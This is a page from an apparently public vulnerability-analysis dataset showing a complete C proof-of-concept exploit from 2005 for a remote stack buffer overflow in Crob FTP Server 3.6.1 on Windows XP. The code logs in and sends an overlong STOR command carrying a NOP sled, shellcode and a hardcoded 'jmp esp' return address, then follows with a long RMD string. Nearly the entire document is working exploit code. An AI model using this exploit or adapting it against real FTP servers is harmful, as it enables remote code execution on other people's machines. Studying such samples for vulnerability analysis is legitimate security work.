Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1028.txt157 linesDownload Raw Back to exploits
1/*

2 * CrobFTP remote stack overflow PoC 

3 * ---------------------------------

4 * Tested on Crob FTP Server 3.6.1, Windows XP

5 * 

6 * Coded by Leon Juranic <ljuranic@lss.hr>

7 * LSS Security / http://security.lss.hr

8 *

9 */

10

11

12

13#include <stdio.h>

14#include <windows.h>

15#include <time.h>

16

17#pragma comment (lib,"ws2_32")

18

19

20char *fzz_recv (int sock)

21{

22	fd_set fds;

23	struct timeval tv;

24	static char buf[10000];

25	char *ptr=buf;

26	int n;

27	tv.tv_sec = 5;

28	tv.tv_usec = 0;

29

30	FD_ZERO(&fds);

31	FD_SET(sock,&fds);

32	if (select(NULL,&fds,NULL,NULL,&tv) != 0) {

33		if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);

34		buf[n-1] = '\0';

35		printf ("RECV: %s\n",buf);

36		return buf;

37	}

38	else {

39		return NULL;

40	}

41	

42}

43	

44

45

46

47int login (int sock, char *user, char *pass)

48{

49	char buf[1024], *bla;

50	bla=fzz_recv(sock);

51	printf ("recv: %s\n",bla);

52	sprintf (buf,"USER %s\r\n",user);

53	send (sock,buf,strlen(buf),0);

54	bla=fzz_recv(sock);

55	printf ("recv: %s\n",bla);

56	sprintf (buf,"PASS %s\r\n",pass);

57	send (sock,buf,strlen(buf),0);

58	bla=fzz_recv(sock);

59	printf ("recv: %s\n",bla);

60	if (strcmp("230",bla) != NULL)

61		return 0;

62	else return -1;

63	return 0;

64}

65

66

67

68

69void lame_sploit (char *pack, char *user, char *pass)

70{

71	WORD wVersionRequested;

72	WSADATA wsaData;

73	int sock, err,x;

74	struct sockaddr_in sin;

75	char buf[2000],tmp[1000];

76	

77

78	char *shell=				// 5 min. XP SP1 shellcode

79		"\x33\xc0"				// xor eax,eax

80		"\x50"					// push eax (\0)

81		"\x68\x2e\x65\x78\x65"  // push '.exe'

82		"\x68\x63\x61\x6c\x63"  // push 'calc'

83		"\x54"					// push esp

84		"\xba\x44\x80\xc2\x77"  // mov  edx, 77c28044

85		"\xff\xd2";				// call edx  (system)

86

87

88	wVersionRequested = MAKEWORD( 2, 2 );

89	err = WSAStartup( wVersionRequested, &wsaData );

90	if ( err != 0 ) {

91		printf ("ERROR: Sorry, cannot create socket!!!\n");

92		ExitProcess(-1);

93	}

94

95	sock=socket(AF_INET,SOCK_STREAM,0);

96	

97

98	sin.sin_family=AF_INET;

99	sin.sin_addr.s_addr = inet_addr(pack);

100	sin.sin_port = htons(21);

101	

102	if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {

103		printf ("CONNECT :(((\n");

104		ExitProcess(-1);

105	}

106

107	if (login(sock,user,pass) == -1)

108	{

109		printf ("ERROR: Cannot login to FTP server, sorry!!!\n");

110		exit(-1);

111	}

112	

113	memset(tmp,0,sizeof(tmp));

114	memset (tmp,0x90,180);

115

116

117	memcpy (&tmp[80],shell,strlen(shell));

118	*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'

119	*(long*)&tmp[166] = 0x74ec8390; //		  sub esp,0x74

120	*(long*)&tmp[170] = 0x9090e4ff; //		  jmp esp

121

122

123	_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);

124

125	printf ("DEBUG: %.30s %d\n",buf,strlen(buf));

126	send (sock,buf,strlen(buf),0);

127	printf ("%s\n",fzz_recv(sock));

128

129	strcpy(buf,"RMD ");

130	for (x=0;x<276;x++)

131		strcat (buf,".../");

132	strcat(buf,"\r\n");

133

134	printf ("Sending exploit strings\n");

135	send (sock,buf,strlen(buf),0);

136	printf ("recv: %s\n",fzz_recv(sock));

137

138

139}

140

141

142

143main (int argc, char **argv)

144{

145	printf ("CrobFTP Stack overflow PoC \n"

146		    "Coded by Leon Juranic <ljuranic@lss.hr>\n"

147			"LSS Security / http://security.lss.hr/\n");

148

149	if (argc < 4 ) {

150		printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);

151		exit(-1);

152	}

153	lame_sploit(argv[1],argv[2],argv[3]);

154

155}

156

157// milw0rm.com [2005-06-03]